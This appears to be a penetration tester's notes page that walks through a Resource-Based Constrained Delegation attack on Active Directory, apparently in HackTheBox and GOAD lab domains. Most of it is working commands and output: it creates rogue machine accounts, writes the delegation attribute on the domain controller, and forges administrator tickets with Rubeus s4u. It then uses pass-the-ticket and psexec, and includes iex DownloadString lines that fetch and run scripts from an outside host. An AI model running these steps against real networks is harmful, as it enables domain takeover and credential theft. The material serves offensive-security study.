Resource Based Constrained Delegation

Taking over a computer object and performing a S4U attack

Resource Based Constrained Delegation can be exploited by adding a fake computer $FAKE-COMP01 to the domain, configuring it to act on behalf of the DC. This lets us request Kerberos tickets as $FAKE-COMP01 impersonating a domain admin. We then use Pass-the-Ticket to authenticate as admin and take over the domain by performing a S4U attack.

Kerberos Constrained Delegation OverviewMicrosoftLearn

How does it work.

Resource-Based Constrained Delegation (RBCD) is a mechanism in Active Directory that allows a specific object to impersonate any user instead of a user impersonating a user. RBCD can granting computer objects impersonation rights. This is done by using msDS-AllowedToActOnBehalfOfOtherIdentity. Any user withpermissions (like GenericAll or WriteDacl) on a computer account can configure it.

What is needed

Code execution

Code execution as a domain user belonging to Authenticated Users

Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DSMachineAccountQuota

ms-ds-machineaccountquota

The ms-ds-machineaccountquota attribute needs to be higher than 0. This attribute controls the amount of computers that authenticated domain users can add to the domain.

Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

Need GenericAll or WriteDACL

Our current user or a group that our user is a member of, needs to have WRITE privileges ( GenericAll , WriteDACL ) over a domain joined computer

Performing the S4U attack

S4U (Service for User) is a Kerberos protocol extension that allows a service to impersonate a user to access other resources. A successful S4U attack involves exploiting vulnerabilities in this mechanism to gain unauthorized access to sensitive resources.

Method1

Create a new computer account to abuse write privilege on the DC. We then set msDS-AllowedToActOnBehalfOfOtherIdentity to our account so we can impersonate as any user from to the DC. For this you need to import Powermad.

New-MachineAccount -MachineAccount Zen -Password $(ConvertTo-SecureString 'pass@123' -AsPlainText -Force)

We can then set msDS-AllowedToActOnBehalfOfOtherIdentity on our account

Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount Zen$

And retrieve tickets with Rubeus

.\Rubeus.exe s4u /user:Zen$ /password:pass@123/domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrap

Find the administrator ticket and echo it into base64 -d and save it as ticket.b64. Then use ticketconverter to a format impacket can use.

$ python ticketConverter.py ticket.kirbi ticket.ccache                                               
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Finally we can login as administrator. Make sure the dc.domain.yzt is added to hosts.

KRB5CCNAME=ticket.ccache python psexec.py support.htb/administrator@dc.support.htb -k -no-pass

Method 2

First create the fake computer and add it to the domain with Powermad.

PS C:\Users\support\Documents> New-MachineAccount -MachineAccount ZenFakeComputer -Password $(ConvertTo-SecureString 'pass@132' -AsPlainText -Force)
[+] Machine account ZenFakeComputer added

# Check it the new machine was added
PS C:\Users\support\Documents> Get-ADComputer -identity ZenFakeComputer
DistinguishedName : CN=ZenFakeComputer,CN=Computers,DC=support,DC=htb
DNSHostName       : ZenFakeComputer.support.htb
Enabled           : True
Name              : ZenFakeComputer
ObjectClass       : computer
ObjectGUID        : 2aa665e0-20e0-420d-ac5c-b59c7b8b3de9
SamAccountName    : ZenFakeComputer$
SID               : S-1-5-21-1677581083-3380853377-188903654-5602
UserPrincipalName :

Configure the DC to trust my fake computer by creating an ACL with its SID and assigning it to the DC.

# Get the objectSID of the target computer (ZenFakeComputer)
$fakesid = Get-DomainComputer ZenFakeComputer | select -expand objectsid

# Create a new security descriptor that grants full control to the target computer
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"

# Convert the security descriptor to a byte array
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Set the msds-allowedtoactonbehalfofotheridentity attribute on the target computer
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Check if it worked

# Get the raw security descriptor of the domain controller
$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select-Object -ExpandProperty msds-allowedtoactonbehalfofotheridentity

# Create a new security descriptor object from the raw bytes
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0

# Access the discretionary access control list (DACL) of the security descriptor
$Descriptor.DiscretionaryAcl

BinaryLength       : 36
AceQualifier       : AccessAllowed
IsCallback         : False
OpaqueLength       : 0
AccessMask         : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5602
AceType            : AccessAllowed
AceFlags           : None
IsInherited        : False
InheritanceFlags   : None
PropagationFlags   : None
AuditFlags         : None

It shows an Access Control List that specifies the machines that can act on behalf of the DC with SecurityIdentifier of my fake computer with AccesAllowed.

First get the rc4_hmac value.

PS C:\Users\support\Documents> .\Rubeus.exe hash /password:zenpass@123 /user:ZenFakeComp /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : zenpass@123
[*] Input username             : ZenFakeComp
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBZenFakeComp
[*]       rc4_hmac             : DFA8C3D737ACDD5F9AF9F4B60205E8D9
[*]       aes128_cts_hmac_sha1 : DBC10236F5F70D66F4BBF93819D3635B
[*]       aes256_cts_hmac_sha1 : 6AFC3C4155B027E5B43BE2B3B1636114C877C3B077808F25B3689A1925931D40
[*]       des_cbc_md5          : 8F20A2C8B90780C7

Next retrieve the tickets with Rubeus

PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:ZenFakeComp$ /rc4:DFA8C3D737ACDD5F9AF9F4B60205E8D9 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

from windows

enter-pssession -computer kingslanding.sevenkingdoms.local -Credential stannis.baratheon

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/Powermad.ps1'))

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)

[+] Machine account PWNED added

Set-DomainRBCD kingslanding -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose

Set-DomainRBCD kingslanding.sevenkingdoms.local -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose

[kingslanding.sevenkingdoms.local]: PS C:\Users\stannis.baratheon\Documents> Set-DomainRBCD kingslanding.sevenkingdoms.local -DelegateFrom PWNED -Domain sevenkingdoms.local -Server kingslanding.sevenkingdoms.local -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://kingslanding.sevenkingdoms.local/DC=sevenkingdoms,DC=local
VERBOSE: [Set-DomainRBCD] Appending DelegateFilter: (|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED)))
VERBOSE: [Set-DomainRBCD] Set-DomainRBCD filter string: (|(|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED))))
VERBOSE: [Set-DomainRBCD] Appending to SDDL string: (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3008081783-3975149589-1763115855-1126)
VERBOSE: [Set-DomainRBCD] Using SDDL string: O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3008081783-3975149589-1763115855-1126)
VERBOSE: [Get-DomainSearcher] search base: LDAP://kingslanding.sevenkingdoms.local/DC=sevenkingdoms,DC=local
VERBOSE: [Set-DomainRBCD] Set-DomainRBCD filter string: (|(|(|(samAccountName=PWNED)(name=PWNED)(displayname=PWNED))))
VERBOSE: [Set-DomainRBCD] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0 36 0 0 0 1 2 0 0 0 0
0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 119 175 75 179 21 248 239 236 79 3 23 105 102 4 0 0'
for object 'KINGSLANDING$'
[kingslanding.sevenkingdoms.local]: PS C:\Users\stannis.baratheon\Documents>

Get-DomainComputer PWNED

./Rubeus.exe asktgt /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /user:PUCKPC /password:12345 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show

notice this [*] Using rc4_hmac hash: 7A21990FCD3D759941E45C490F143D5F

.\Rubeus.exe s4u /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /user:PWNED /rc4:7A21990FCD3D759941E45C490F143D5F /impersonateuser:administrator /msdsspn:CIFS/kingslanding.sevenkingdoms.local /ptt /nowrap

dir \\kingslanding.sevenkingdoms.local\c$

Resource-Based Constrained Delegation attack

Abusing this primitive is possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

PowerView can be used to then retrieve the security identifier (SID) of the newly created computer account:

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:

Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

Rubeus.exe hash /password:Summer2018!

And finally we can use Rubeus’ *s4u* module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt

Last updated 4 months ago